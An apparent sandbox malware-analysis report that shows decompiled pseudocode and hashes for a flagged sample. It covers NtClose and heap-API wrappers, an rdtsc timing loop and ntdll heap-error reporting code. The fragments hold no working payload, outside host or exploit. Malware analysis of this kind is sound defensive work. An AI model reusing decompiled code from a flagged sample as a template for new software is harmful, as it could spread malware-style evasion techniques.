                                                        control_flow_graph 109 41a4a0-41a4b6 110 41a4bc-41a4c9 NtClose 109->110 111 41a4b7 call 41af70 109->111 111->110
                                                        C-Code - Quality: 100%
                                                        			E0041A4A0(intOrPtr _a4, void* _a8) {
                                                        				long _t8;
                                                        				void* _t11;
                                                        
                                                        				_t5 = _a4;
                                                        				_t2 = _t5 + 0x10; // 0x300
                                                        				_t3 = _t5 + 0xc50; // 0x40a943
                                                        				E0041AF70(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                        				_t8 = NtClose(_a8); // executed
                                                        				return _t8;
                                                        			}






                                                        APIs
                                                        • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4C5
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_400000_SecuriteInfo.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                        • Instruction ID: c33b16737f5c434921732b7844560f19735d13db32535ac4bb7687e6ea559cfd
                                                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                        • Instruction Fuzzy Hash: 04D01776200214ABD710EBD9CC85EE77BACEF48764F154499BA189B242C530FA1086E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 112 41a49c-41a4c9 call 41af70 NtClose
                                                        C-Code - Quality: 82%
                                                        			E0041A49C(void* __eax, intOrPtr _a4, void* _a8) {
                                                        				long _t10;
                                                        				void* _t13;
                                                        
                                                        				asm("in eax, dx");
                                                        				_t7 = _a4;
                                                        				_t2 = _t7 + 0x10; // 0x300
                                                        				_t3 = _t7 + 0xc50; // 0x40a943
                                                        				E0041AF70(_t13, _a4, _t3,  *_t2, 0, 0x2c);
                                                        				_t10 = NtClose(_a8); // executed
                                                        				return _t10;
                                                        			}






                                                        APIs
                                                        • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4C5
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_400000_SecuriteInfo.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: bda98e7e765b9442b5a9279a4d0ed0fca0bf41d6faac94aadb139973c5bb719c
                                                        • Instruction ID: 0e45f592b5f4b4a9e32a28aef072a541f7abe52b2299f0f74ea8799ce7f565bb
                                                        • Opcode Fuzzy Hash: bda98e7e765b9442b5a9279a4d0ed0fca0bf41d6faac94aadb139973c5bb719c
                                                        • Instruction Fuzzy Hash: 4CD02BAD40D2C04BC710EAF464C14C37B81DE512183244D8EE4D847207C128D21A9291
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 121 1829860-182986c LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: daa07ec57ce92b5500cacea640df5d1593bd5e3731b97ac28c78dd076e6a527b
                                                        • Instruction ID: 2c731a6ca3a0e688ba35da5913310bc6760efd02f231eabf1c0357b8ce5a7c18
                                                        • Opcode Fuzzy Hash: daa07ec57ce92b5500cacea640df5d1593bd5e3731b97ac28c78dd076e6a527b
                                                        • Instruction Fuzzy Hash: 8090027121100413D111619945047070009A7D0382FD5C512A1418668DD6968A67B1A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 120 18296e0-18296ec LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 1f197121da4d108df291e7556301ca05646107dcbbbb49ef3e90a018c63acf8b
                                                        • Instruction ID: b7229ba913c766ca75bed3f7d9d170450b8fcbf240b419e84b2217148a37172c
                                                        • Opcode Fuzzy Hash: 1f197121da4d108df291e7556301ca05646107dcbbbb49ef3e90a018c63acf8b
                                                        • Instruction Fuzzy Hash: 6790027121108802D1106199840474A0005A7D0342F99C511A5418768DC6D589A671A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 119 1829660-182966c LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: cdfe5c9480e6e120763604fd09d5968447d526e1b64ba7054748d957fdfcd687
                                                        • Instruction ID: 06dd1eeeb728f1f7d37d29279727990266f380503fc4e9c212bf151b648323e3
                                                        • Opcode Fuzzy Hash: cdfe5c9480e6e120763604fd09d5968447d526e1b64ba7054748d957fdfcd687
                                                        • Instruction Fuzzy Hash: E590027121100802D1807199440464A0005A7D1342FD5C115A1019764DCA558B6E77E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 93%
                                                        			E00409AB0(intOrPtr _a4) {
                                                        				intOrPtr _v8;
                                                        				char _v24;
                                                        				char _v284;
                                                        				char _v804;
                                                        				char _v840;
                                                        				void* _t24;
                                                        				void* _t31;
                                                        				void* _t33;
                                                        				void* _t34;
                                                        				void* _t39;
                                                        				void* _t50;
                                                        				intOrPtr _t52;
                                                        				void* _t53;
                                                        				void* _t54;
                                                        				void* _t55;
                                                        				void* _t56;
                                                        
                                                        				_t52 = _a4;
                                                        				_t2 =  &_v24; // 0x8b55b27f
                                                        				_t39 = 0; // executed
                                                        				_t24 = E00407EA0(_t52, _t2); // executed
                                                        				_t54 = _t53 + 8;
                                                        				if(_t24 != 0) {
                                                        					E004080B0( &_v24,  &_v840);
                                                        					_t55 = _t54 + 8;
                                                        					do {
                                                        						E0041BE30( &_v284, 0x104);
                                                        						_t47 =  &_v284;
                                                        						E0041C4A0( &_v284,  &_v804);
                                                        						_t56 = _t55 + 0x10;
                                                        						_t50 = 0x4f;
                                                        						while(1) {
                                                        							_t31 = E00414DF0(_t47, E00414D90(_t52, _t50),  &_v284);
                                                        							_t56 = _t56 + 0x10;
                                                        							if(_t31 != 0) {
                                                        								break;
                                                        							}
                                                        							_t50 = _t50 + 1;
                                                        							if(_t50 <= 0x62) {
                                                        								continue;
                                                        							} else {
                                                        							}
                                                        							goto L8;
                                                        						}
                                                        						_t9 = _t52 + 0x14; // 0xffffe045
                                                        						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                                        						_t39 = 1;
                                                        						L8:
                                                        						_t33 = E004080E0( &_v24,  &_v840);
                                                        						_t55 = _t56 + 8;
                                                        					} while (_t33 != 0 && _t39 == 0);
                                                        					_t34 = E00408160(_t52,  &_v24); // executed
                                                        					if(_t39 == 0) {
                                                        						asm("rdtsc");
                                                        						asm("rdtsc");
                                                        						_v8 = _t34 - 0 + _t34;
                                                        						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                                        					}
                                                        					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                                        					_t20 = _t52 + 0x31; // 0x5608758b
                                                        					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                                        					return 1;
                                                        				} else {
                                                        					return _t24;
                                                        				}
                                                        			}

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_400000_SecuriteInfo.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d2c56eb8839fe751382d3ed7451ab415c40210c8f77f6249a84ada126e88df99
                                                        • Instruction ID: 59e6146db33f4cde1181012f6319e9085256b3a86d69d0266e6165f22895f17e
                                                        • Opcode Fuzzy Hash: d2c56eb8839fe751382d3ed7451ab415c40210c8f77f6249a84ada126e88df99
                                                        • Instruction Fuzzy Hash: 2B210AB2D4020857CB25DA64AD52BFF73BCAB54314F44007FE949A3182F638BE498BA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 6 41a640-41a671 call 41af70 RtlAllocateHeap
                                                        C-Code - Quality: 100%
                                                        			E0041A640(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                                        				void* _t10;
                                                        				void* _t15;
                                                        
                                                        				E0041AF70(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                        				_t6 =  &_a8; // 0x414536
                                                        				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                                        				return _t10;
                                                        			}

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A66D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_400000_SecuriteInfo.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID: 6EA
                                                        • API String ID: 1279760036-1400015478
                                                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                        • Instruction ID: 592b11653d41df1d8c7fc10f01e82977d3d632a9db32d8feb401f664a84ee6f2
                                                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                        • Instruction Fuzzy Hash: 34E012B5200208ABDB14EF99CC41EA777ACAF88664F118559BA085B242C630F9118AB0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 103 41a673-41a697 call 41af70 105 41a69c-41a6b1 RtlFreeHeap 103->105
                                                        C-Code - Quality: 68%
                                                        			E0041A673(void* __eax, void* __edi, void* _a4, long _a8, void* _a12) {
                                                        				intOrPtr _v0;
                                                        				char _t17;
                                                        
                                                        				asm("aas");
                                                        				asm("pushfd");
                                                        				 *(__edi + 0x58) =  *(__edi + 0x58) << 1;
                                                        				_t14 = _v0;
                                                        				_t7 = _t14 + 0xc74; // 0xc74
                                                        				E0041AF70(__edi, _v0, _t7,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
                                                        				_t17 = RtlFreeHeap(_a4, _a8, _a12); // executed
                                                        				return _t17;
                                                        			}

                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A6AD
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_400000_SecuriteInfo.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID:
                                                        • API String ID: 3298025750-0
                                                        • Opcode ID: 77b2eeb3d79cb32335833725ec47d385811f650ff39fbdb9feac8615ad5f0ee8
                                                        • Instruction ID: b2184071c80a664501a0a6037332ba82b29dc6c4a11714587f914013b17e54d4
                                                        • Opcode Fuzzy Hash: 77b2eeb3d79cb32335833725ec47d385811f650ff39fbdb9feac8615ad5f0ee8
                                                        • Instruction Fuzzy Hash: D3E06DB12046017FD714DF68CC48EE73B6AEF84390F004659F90997292C231E921CAA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 106 41a680-41a696 107 41a69c-41a6b1 RtlFreeHeap 106->107 108 41a697 call 41af70 106->108 108->107
                                                        C-Code - Quality: 100%
                                                        			E0041A680(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                        				char _t10;
                                                        				void* _t15;
                                                        
                                                        				_t3 = _a4 + 0xc74; // 0xc74
                                                        				E0041AF70(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                        				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                        				return _t10;
                                                        			}

                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A6AD
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_400000_SecuriteInfo.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID:
                                                        • API String ID: 3298025750-0
                                                        • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                        • Instruction ID: fcee721cd7445a9ad64dbfb52f2376cb99f5489ae25ce6a6cb2d596bcbca8a62
                                                        • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                        • Instruction Fuzzy Hash: 9FE046B5200208ABDB18EF99CC49EE777ACEF88764F018559FE085B252C630F910CAF0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 115 182967a-182967f 116 1829681-1829688 115->116 117 182968f-1829696 LdrInitializeThunk 115->117
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: da0603e2eb0de65c383044cf93964413067b37f1750172528046191bf91115af
                                                        • Instruction ID: 77b624dd11db2926840d1443cf6530b3007ed8ddd453c1a09ba5f96ff48cfe1d
                                                        • Opcode Fuzzy Hash: da0603e2eb0de65c383044cf93964413067b37f1750172528046191bf91115af
                                                        • Instruction Fuzzy Hash: 85B09B71D014D5C9D612D7A44608717794077D0745F57C161D2024751B4778C1D5F5F5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0189B314
                                                        • write to, xrefs: 0189B4A6
                                                        • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0189B2F3
                                                        • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0189B476
                                                        • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0189B484
                                                        • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0189B53F
                                                        • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0189B39B
                                                        • The resource is owned shared by %d threads, xrefs: 0189B37E
                                                        • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0189B305
                                                        • *** Resource timeout (%p) in %ws:%s, xrefs: 0189B352
                                                        • Go determine why that thread has not released the critical section., xrefs: 0189B3C5
                                                        • *** Inpage error in %ws:%s, xrefs: 0189B418
                                                        • *** enter .exr %p for the exception record, xrefs: 0189B4F1
                                                        • <unknown>, xrefs: 0189B27E, 0189B2D1, 0189B350, 0189B399, 0189B417, 0189B48E
                                                        • a NULL pointer, xrefs: 0189B4E0
                                                        • The resource is owned exclusively by thread %p, xrefs: 0189B374
                                                        • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0189B38F
                                                        • The instruction at %p tried to %s , xrefs: 0189B4B6
                                                        • *** then kb to get the faulting stack, xrefs: 0189B51C
                                                        • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0189B323
                                                        • The critical section is owned by thread %p., xrefs: 0189B3B9
                                                        • *** An Access Violation occurred in %ws:%s, xrefs: 0189B48F
                                                        • an invalid address, %p, xrefs: 0189B4CF
                                                        • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0189B2DC
                                                        • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0189B3D6
                                                        • The instruction at %p referenced memory at %p., xrefs: 0189B432
                                                        • This failed because of error %Ix., xrefs: 0189B446
                                                        • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0189B47D
                                                        • *** enter .cxr %p for the context, xrefs: 0189B50D
                                                        • read from, xrefs: 0189B4AD, 0189B4B2
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                        • API String ID: 0-108210295
                                                        • Opcode ID: 9810250657eaab38704e5db695a9c821ae715496c5b8832ab8e88a222290af52
                                                        • Instruction ID: fc9096970c35ac193ed0a89c0fec8fac3c1f2760e9052662b353654d5e9fbcd5
                                                        • Opcode Fuzzy Hash: 9810250657eaab38704e5db695a9c821ae715496c5b8832ab8e88a222290af52
                                                        • Instruction Fuzzy Hash: AA8147B1A40204FFDF229A4AEC95D7BBF75EF56B96F080048F5049B152D261C681D7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 44%
                                                        			E018A1C06() {
                                                        				signed int _t27;
                                                        				char* _t104;
                                                        				char* _t105;
                                                        				intOrPtr _t113;
                                                        				intOrPtr _t115;
                                                        				intOrPtr _t117;
                                                        				intOrPtr _t119;
                                                        				intOrPtr _t120;
                                                        
                                                        				_t105 = 0x17c48a4;
                                                        				_t104 = "HEAP: ";
                                                        				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                        					_push(_t104);
                                                        					E017EB150();
                                                        				} else {
                                                        					E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        				}
                                                        				_push( *0x18d589c);
                                                        				E017EB150("Heap error detected at %p (heap handle %p)\n",  *0x18d58a0);
                                                        				_t27 =  *0x18d5898; // 0x0
                                                        				if(_t27 <= 0xf) {
                                                        					switch( *((intOrPtr*)(_t27 * 4 +  &M018A1E96))) {
                                                        						case 0:
                                                        							_t105 = "heap_failure_internal";
                                                        							goto L21;
                                                        						case 1:
                                                        							goto L21;
                                                        						case 2:
                                                        							goto L21;
                                                        						case 3:
                                                        							goto L21;
                                                        						case 4:
                                                        							goto L21;
                                                        						case 5:
                                                        							goto L21;
                                                        						case 6:
                                                        							goto L21;
                                                        						case 7:
                                                        							goto L21;
                                                        						case 8:
                                                        							goto L21;
                                                        						case 9:
                                                        							goto L21;
                                                        						case 0xa:
                                                        							goto L21;
                                                        						case 0xb:
                                                        							goto L21;
                                                        						case 0xc:
                                                        							goto L21;
                                                        						case 0xd:
                                                        							goto L21;
                                                        						case 0xe:
                                                        							goto L21;
                                                        						case 0xf:
                                                        							goto L21;
                                                        					}
                                                        				}
                                                        				L21:
                                                        				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                        					_push(_t104);
                                                        					E017EB150();
                                                        				} else {
                                                        					E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        				}
                                                        				_push(_t105);
                                                        				E017EB150("Error code: %d - %s\n",  *0x18d5898);
                                                        				_t113 =  *0x18d58a4; // 0x0
                                                        				if(_t113 != 0) {
                                                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                        						_push(_t104);
                                                        						E017EB150();
                                                        					} else {
                                                        						E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        					}
                                                        					E017EB150("Parameter1: %p\n",  *0x18d58a4);
                                                        				}
                                                        				_t115 =  *0x18d58a8; // 0x0
                                                        				if(_t115 != 0) {
                                                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                        						_push(_t104);
                                                        						E017EB150();
                                                        					} else {
                                                        						E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        					}
                                                        					E017EB150("Parameter2: %p\n",  *0x18d58a8);
                                                        				}
                                                        				_t117 =  *0x18d58ac; // 0x0
                                                        				if(_t117 != 0) {
                                                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                        						_push(_t104);
                                                        						E017EB150();
                                                        					} else {
                                                        						E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        					}
                                                        					E017EB150("Parameter3: %p\n",  *0x18d58ac);
                                                        				}
                                                        				_t119 =  *0x18d58b0; // 0x0
                                                        				if(_t119 != 0) {
                                                        					L41:
                                                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                        						_push(_t104);
                                                        						E017EB150();
                                                        					} else {
                                                        						E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        					}
                                                        					_push( *0x18d58b4);
                                                        					E017EB150("Last known valid blocks: before - %p, after - %p\n",  *0x18d58b0);
                                                        				} else {
                                                        					_t120 =  *0x18d58b4; // 0x0
                                                        					if(_t120 != 0) {
                                                        						goto L41;
                                                        					}
                                                        				}
                                                        				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                        					_push(_t104);
                                                        					E017EB150();
                                                        				} else {
                                                        					E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        				}
                                                        				return E017EB150("Stack trace available at %p\n", 0x18d58c0);
                                                        			}












                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                        • API String ID: 0-2897834094
                                                        • Opcode ID: 91d2694cad288200ba3d268ac476401d39f69390d58fa4d7b39e986520840483
                                                        • Instruction ID: 3f8c12542f8d999cb1f4d41a8fdb1617efbca71a7f86267c00dcbdb7b74146ca
                                                        • Opcode Fuzzy Hash: 91d2694cad288200ba3d268ac476401d39f69390d58fa4d7b39e986520840483
                                                        • Instruction Fuzzy Hash: 3F61843651614ADFE222AB4AD4DD925F7F4E704B70F89807EF50A9F301DA34DA408F5A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 59%
                                                        			E018A4AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
                                                        				signed int _v6;
                                                        				signed int _v8;
                                                        				signed int _v12;
                                                        				signed int _v16;
                                                        				signed int _v20;
                                                        				signed int _v24;
                                                        				signed int _v28;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				void* __ebp;
                                                        				signed int _t189;
                                                        				intOrPtr _t191;
                                                        				intOrPtr _t210;
                                                        				signed int _t225;
                                                        				signed char _t231;
                                                        				intOrPtr _t232;
                                                        				unsigned int _t245;
                                                        				intOrPtr _t249;
                                                        				intOrPtr _t259;
                                                        				signed int _t281;
                                                        				signed int _t283;
                                                        				intOrPtr _t284;
                                                        				signed int _t288;
                                                        				signed int* _t294;
                                                        				signed int* _t298;
                                                        				intOrPtr* _t299;
                                                        				intOrPtr* _t300;
                                                        				signed int _t307;
                                                        				signed int _t309;
                                                        				signed short _t312;
                                                        				signed short _t315;
                                                        				signed int _t317;
                                                        				signed int _t320;
                                                        				signed int _t322;
                                                        				signed int _t326;
                                                        				signed int _t327;
                                                        				void* _t328;
                                                        				signed int _t332;
                                                        				signed int _t340;
                                                        				signed int _t342;
                                                        				signed char _t344;
                                                        				signed int* _t345;
                                                        				void* _t346;
                                                        				signed char _t352;
                                                        				signed char _t367;
                                                        				signed int _t374;
                                                        				intOrPtr* _t378;
                                                        				signed int _t380;
                                                        				signed int _t385;
                                                        				signed char _t390;
                                                        				unsigned int _t392;
                                                        				signed char _t395;
                                                        				unsigned int _t397;
                                                        				intOrPtr* _t400;
                                                        				signed int _t402;
                                                        				signed int _t405;
                                                        				intOrPtr* _t406;
                                                        				signed int _t407;
                                                        				intOrPtr _t412;
                                                        				void* _t414;
                                                        				signed int _t415;
                                                        				signed int _t416;
                                                        				signed int _t429;
                                                        
                                                        				_v16 = _v16 & 0x00000000;
                                                        				_t189 = 0;
                                                        				_v8 = _v8 & 0;
                                                        				_t332 = __edx;
                                                        				_v12 = 0;
                                                        				_t414 = __ecx;
                                                        				_t415 = __edx;
                                                        				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
                                                        					L88:
                                                        					_t416 = _v16;
                                                        					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
                                                        						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
                                                        						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
                                                        							L107:
                                                        							return 1;
                                                        						}
                                                        						_t191 =  *[fs:0x30];
                                                        						__eflags =  *(_t191 + 0xc);
                                                        						if( *(_t191 + 0xc) == 0) {
                                                        							_push("HEAP: ");
                                                        							E017EB150();
                                                        						} else {
                                                        							E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        						}
                                                        						_push(_v12);
